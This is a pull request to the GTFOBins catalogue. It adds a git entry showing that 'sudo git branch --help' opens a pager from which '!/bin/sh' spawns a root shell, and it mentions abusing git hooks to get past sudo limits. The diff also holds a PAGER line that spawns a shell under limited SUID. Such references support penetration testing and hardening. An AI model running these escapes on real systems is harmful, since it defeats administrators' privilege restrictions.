### PR TITLE
Adding submodule sudo for git

### DIFF
--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -12,6 +12,10 @@ functions:
       code: |
         sudo git -p help config
         !/bin/sh
+    - description: The default pager can also be started from any git submodule by using `--help`.
+      code: |
+        sudo git branch --help config
+        !/bin/sh
   limited-suid:
     - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
 ---

--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -12,7 +12,7 @@ functions:
       code: |
         sudo git -p help config
         !/bin/sh
-    - description: The default pager can also be started from any git submodule by using `--help`.
+    - description: The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
       code: |
         sudo git branch --help config
         !/bin/sh


### PR DESCRIPTION
In some situations you are only allowed to invoke a subcommand of git
with sudo. In most of these situations one can abuse hooks to still
get the job done, but the pager option I added is more simple.